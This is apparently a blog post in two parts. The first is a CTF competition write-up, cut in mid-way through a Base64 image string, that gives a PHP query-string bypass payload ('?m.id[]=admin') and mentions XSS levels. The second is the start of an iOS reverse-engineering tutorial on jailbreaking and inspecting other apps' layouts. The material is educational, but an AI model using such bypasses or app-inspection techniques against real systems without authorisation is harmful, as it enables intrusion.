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
From the data: prefix we can tell this is a Base64-encoded PNG image. Pasting the decoded string directly into the browser’s address bar displays the image, which gives us the URL where the answer is located. Enter that URL to pass the level!
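Decoding can be done with any Base64 tool; below is a minimal Swift sketch of the same step, with the garbled string represented by a placeholder rather than the actual question content:

```swift
import Foundation

// Placeholder: paste the garbled string copied from the question here.
let garbledText = "<garbled Base64 string from the question>"

if let data = Data(base64Encoded: garbledText, options: .ignoreUnknownCharacters),
   let decoded = String(data: data, encoding: .utf8) {
    // For this question the decoded string is a data:image/png;base64,... URI
    // that can be pasted straight into the browser's address bar.
    print(decoded)
} else {
    print("Not valid Base64 (or not UTF-8 text)")
}
```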
4. Break through the blockade
Question Explanation: This question displays its own PHP source code. You need to find a way to use GET parameters to bypass the check and reach the setPassedCookie(); call in the else block.
Solution: This question relies on a PHP quirk that is common in CTFs but not widely known; see the following for details:
Summary of Common PHP Vulnerabilities in CTF
The question has been slightly modified. The answer to this question is: ?m.id[]=admin
5. Penetration Test, 6. Penetration Test 2
These two questions are basic introductory XSS questions, so they won’t be elaborated here.
For this type of question, since the answer is placed on the front end, a site that obfuscates JavaScript (making it practically irreversible) was used: https://www.sojson.com/jsobfuscator.html
(Though I’m not sure how irreversible it really is; anyway, if someone manages to crack it, they deserve to pass!)
7. Moonlight Treasure Box
This question is taken from a puzzle app, so it won’t be displayed here.
The competition system took about a week to set up, and the questions took about three months to gather (inspiration was needed). The competition has concluded successfully, and the feedback was quite positive ("interesting and fun"), which was exactly my original intention: I hoped everyone would explore and brainstorm from an interesting starting point. That is why neither the question names (all very movie-like) nor the question directions involve anything too deeply engineering- or calculation-heavy; that would have been too rigid and dull!
Additionally, here is the per-question solve rate as a reference for difficulty:
When creating the questions, my biggest fear was that they would be either too easy (everyone solves them quickly) or too hard (everyone gets stuck); both situations are awkward.
The actual results (competition time: 90 minutes) met our expectations: just right, neither too hard nor too easy. The first-place team solved 9 questions and even the last-place team solved 7; very close, but thanks to time scores and hint purchases there was still a clear winner!
Surprisingly, no one solved the entrance to the magic academy… QQ
This concludes the summary of the engineering CTF competition.
Addcn 2019 CTF
For any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Exploring the process from jailbreaking, extracting the .ipa file, dumping the decrypted binary (removing the shell), to UI analysis, injection, and decompilation
The only security-related thing I had done before was « Using Man-in-the-Middle Attack to Sniff Transmission Data ». Following on from that: suppose we encode and encrypt data before transmission and decrypt it inside the APP on receipt, so that man-in-the-middle sniffing is prevented; can the data still be stolen?
The answer is yes! Even without actually testing it, we know there is no unbreakable system in the world, only a question of time and cost; when the time and effort required to crack something exceed the benefit gained, it can be considered secure!
Having done all this, how can it still be broken? This is the topic I want to document in this article — “Reverse Engineering”, cracking open your APP to study how you do encryption and decryption. I’ve always been somewhat clueless about this field, only hearing two major talks at iPlayground 2019, where I roughly understood the principles and implementation. Recently, I had the chance to play around with it and share it with everyone!
macOS version: 10.15.3 Catalina
iOS device: iPhone 6 (iOS 12.4.4 / jailbroken)
*Required Cydia package: OpenSSH
Any iOS version and any iPhone can be used, as long as the device is jailbreakable. It is recommended to use an old phone or a development device to avoid unnecessary risks. You can refer to Mr. Crazy’s Jailbreak Tutorial based on your phone and iOS version. If necessary, you may need to downgrade iOS (check the certification status) before jailbreaking.
I used an old iPhone 6 for testing. It was originally upgraded to iOS 12.4.5, but I found that 12.4.5 couldn’t be jailbroken successfully. So, I downgraded to 12.4.4 and used checkra1n to jailbreak successfully!
The steps are not many and not difficult; it just requires some waiting time!
A silly experience of mine: after downloading the old IPSW file, connect the phone to the Mac and use Finder (macOS 10.15 Catalina and later no longer have iTunes), select the phone under Locations on the left, and in the phone information screen hold “Option” and click “Restore iPhone” to bring up the IPSW file selection window. Choose the old IPSW file you just downloaded to complete the downgrade.
I foolishly clicked Restore iPhone directly… it only wasted time reinstalling the latest version…
Let’s start with something interesting: using tools and a jailbroken phone to see how other people lay out their APPs.
Viewing tools: one is the veteran Reveal (more complete features, costs about US$60, with a free trial), and the other is the free open-source tool Lookin made by the Tencent QMUI team. Here we use Lookin as the demonstration; Reveal works similarly.
If you don’t have a jailbroken phone, it’s okay. This tool is mainly for use in development projects to view Debug layouts (replacing Xcode’s basic inspector). It can also be used in regular development!
Only when you want to view someone else’s APP do you need a jailbroken phone.
You can choose to install using CocoaPods, Breakpoint Injection (only supports simulators), manually import the Framework into the project, or manual setup.
After building and running the project, you can select the APP screen in the Lookin tool -> view the layout structure.
Step 1. Open “Cydia” on the jailbroken phone -> search for “LookinLoader” -> “Install” -> go back to the phone’s “Settings” -> “Lookin” -> “Enabled Applications” -> enable the APP you want to view.
Step 2. Use a cable to connect the phone to the Mac computer -> open the APP you want to view -> go back to the computer, select the APP screen in the Lookin tool -> you can view the layout structure.
Facebook login screen layout structure
You can view the View Hierarchy in the left sidebar and dynamically modify the selected object in the right sidebar.
The original “Create New Account” was changed to “Hahaha” by me
Modifications to the object will also be displayed in real-time on the mobile APP, as shown above.
Just like the “F12” developer tools for web pages, all modifications are only effective for the View and will not affect the actual data; mainly used for Debugging, but you can also use it to change values, take screenshots, and then trick your friends XD.
